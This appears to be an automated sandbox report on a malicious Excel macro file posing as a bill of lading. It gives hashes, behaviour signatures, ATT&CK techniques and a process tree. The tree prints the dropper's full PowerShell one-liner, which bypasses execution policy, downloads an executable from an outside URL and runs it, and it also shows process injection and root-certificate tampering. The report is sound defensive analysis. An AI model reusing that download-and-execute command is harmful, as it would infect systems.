f4dcd21a2e0b2f4432b665157a1f934e5063be6bbf7ef5f92b365bbbeca92331

General

Target

Scan Bill of Lading.xlsm
Size

398KB
MD5

937aa5650aa985dd443f4a03156967c9
SHA1

f40cd6481a66c1608a6b97580fe69f2e4904ed6d
SHA256

f4dcd21a2e0b2f4432b665157a1f934e5063be6bbf7ef5f92b365bbbeca92331
SHA512

8113094f933fbd159ec1d37bd7da487e42a515bfba57c6de6c82358223b2e202c6b592ea8fff18568694ca58fdbaebfb60b53f7974743a8c8c9f4abc1af68b93

Score

10^/10

evasion spyware trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://kyivremont.com/vbc.exe

Signatures

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Explorer.EXE

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Explorer.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1612 EXCEL.EXE
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXE

pid process

1612 EXCEL.EXE
1612 EXCEL.EXE
1612 EXCEL.EXE
1612 EXCEL.EXE
1612 EXCEL.EXE
Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

AddInProcess32.exewuapp.exe

pid process

1760 AddInProcess32.exe
1760 AddInProcess32.exe
1760 AddInProcess32.exe
1760 AddInProcess32.exe
1564 wuapp.exe
1564 wuapp.exe
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Explorer.EXE

pid process

1256 Explorer.EXE
1256 Explorer.EXE
1256 Explorer.EXE
1256 Explorer.EXE
Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

Explorer.EXE

pid process

1256 Explorer.EXE
1256 Explorer.EXE
1256 Explorer.EXE
1256 Explorer.EXE
1256 Explorer.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Explorer.EXE

pid	process
1612	EXCEL.EXE

pid	process
1612	EXCEL.EXE
1612	EXCEL.EXE
1612	EXCEL.EXE
1612	EXCEL.EXE
1612	EXCEL.EXE

pid	process
1760	AddInProcess32.exe
1760	AddInProcess32.exe
1760	AddInProcess32.exe
1760	AddInProcess32.exe
1564	wuapp.exe
1564	wuapp.exe

pid	process
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE

pid	process
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

EXCEL.EXEpowershell.exeputty.exeExplorer.EXEwuapp.exe

description	pid	process	target process
PID 1612 wrote to memory of 1804	1612	EXCEL.EXE	powershell.exe
PID 1612 wrote to memory of 1804	1612	EXCEL.EXE	powershell.exe
PID 1612 wrote to memory of 1804	1612	EXCEL.EXE	powershell.exe
PID 1804 wrote to memory of 1964	1804	powershell.exe	putty.exe
PID 1804 wrote to memory of 1964	1804	powershell.exe	putty.exe
PID 1804 wrote to memory of 1964	1804	powershell.exe	putty.exe
PID 1804 wrote to memory of 1964	1804	powershell.exe	putty.exe
PID 1964 wrote to memory of 1760	1964	putty.exe	AddInProcess32.exe
PID 1964 wrote to memory of 1760	1964	putty.exe	AddInProcess32.exe
PID 1964 wrote to memory of 1760	1964	putty.exe	AddInProcess32.exe
PID 1964 wrote to memory of 1760	1964	putty.exe	AddInProcess32.exe
PID 1964 wrote to memory of 1760	1964	putty.exe	AddInProcess32.exe
PID 1964 wrote to memory of 1760	1964	putty.exe	AddInProcess32.exe
PID 1964 wrote to memory of 1760	1964	putty.exe	AddInProcess32.exe
PID 1256 wrote to memory of 1564	1256	Explorer.EXE	wuapp.exe
PID 1256 wrote to memory of 1564	1256	Explorer.EXE	wuapp.exe
PID 1256 wrote to memory of 1564	1256	Explorer.EXE	wuapp.exe
PID 1256 wrote to memory of 1564	1256	Explorer.EXE	wuapp.exe
PID 1256 wrote to memory of 1564	1256	Explorer.EXE	wuapp.exe
PID 1256 wrote to memory of 1564	1256	Explorer.EXE	wuapp.exe
PID 1256 wrote to memory of 1564	1256	Explorer.EXE	wuapp.exe
PID 1564 wrote to memory of 1128	1564	wuapp.exe	cmd.exe
PID 1564 wrote to memory of 1128	1564	wuapp.exe	cmd.exe
PID 1564 wrote to memory of 1128	1564	wuapp.exe	cmd.exe
PID 1564 wrote to memory of 1128	1564	wuapp.exe	cmd.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exeputty.exeAddInProcess32.exewuapp.exe

description	pid	process
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeDebugPrivilege	1964	putty.exe
Token: SeDebugPrivilege	1760	AddInProcess32.exe
Token: SeDebugPrivilege	1564	wuapp.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

powershell.exeputty.exeAddInProcess32.exewuapp.exe

pid	process
1804	powershell.exe
1964	putty.exe
1964	putty.exe
1964	putty.exe
1760	AddInProcess32.exe
1760	AddInProcess32.exe
1760	AddInProcess32.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe
1564	wuapp.exe

Loads dropped DLL 1 IoCs

Processes:

putty.exe

pid process

1964 putty.exe

pid	process
1964	putty.exe

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1804	1612	powershell.exe	EXCEL.EXE

Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 1804 powershell.exe

flow	pid	process
5	1804	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

putty.exeAddInProcess32.exewuapp.exe

description	pid	process	target process
PID 1964 set thread context of 1760	1964	putty.exe	AddInProcess32.exe
PID 1760 set thread context of 1256	1760	AddInProcess32.exe	Explorer.EXE
PID 1760 set thread context of 1256	1760	AddInProcess32.exe	Explorer.EXE
PID 1564 set thread context of 1256	1564	wuapp.exe	Explorer.EXE

Executes dropped EXE 2 IoCs

Processes:

putty.exeAddInProcess32.exe

pid process

1964 putty.exe
1760 AddInProcess32.exe
Office loads VBA resources, possible macro or embedded object present

pid	process
1964	putty.exe
1760	AddInProcess32.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Checks whether UAC is enabled
- Suspicious use of SendNotifyMessage
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1256

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Scan Bill of Lading.xlsm"
2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://kyivremont.com/vbc.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
3⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Blacklisted process makes network request
PID:1804

C:\Users\Admin\AppData\Local\Temp\putty.exe
"C:\Users\Admin\AppData\Local\Temp\putty.exe"
4⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Executes dropped EXE
PID:1964

C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
"C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
5⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Executes dropped EXE
PID:1760

C:\Windows\SysWOW64\wuapp.exe
"C:\Windows\SysWOW64\wuapp.exe"
2⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
PID:1564

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
3⤵
PID:1128

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\putty.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\putty.exe

Download Submit
\Users\Admin\AppData\Local\Temp\AddInProcess32.exe

Download Submit
memory/1128-22-0x0000000000000000-mapping.dmp

Download
memory/1256-18-0x0000000006C90000-0x0000000006D7B000-memory.dmp

Filesize
940KB

Download
memory/1564-23-0x0000000001E40000-0x0000000001EE4000-memory.dmp

Filesize
656KB

Download
memory/1564-20-0x00000000008A0000-0x00000000008AB000-memory.dmp

Filesize
44KB

Download
memory/1564-19-0x0000000000000000-mapping.dmp

Download
memory/1612-6-0x0000000006AE0000-0x0000000006BE0000-memory.dmp

Filesize
1024KB

Download
memory/1612-0-0x0000000001D40000-0x0000000001D41000-memory.dmp

Filesize
4KB

Download
memory/1612-5-0x0000000006AE0000-0x0000000006BE0000-memory.dmp

Filesize
1024KB

Download
memory/1612-4-0x0000000006AE0000-0x0000000006BE0000-memory.dmp

Filesize
1024KB

Download
memory/1612-3-0x00000000004FA000-0x00000000004FC000-memory.dmp

Filesize
8KB

Download
memory/1612-2-0x0000000001D40000-0x0000000001D41000-memory.dmp

Filesize
4KB

Download
memory/1760-15-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1760-16-0x000000000041E320-mapping.dmp

Download
memory/1804-7-0x0000000000000000-mapping.dmp

Download
memory/1964-12-0x0000000000000000-0x0000000000000000-disk.dmp

Download
memory/1964-8-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads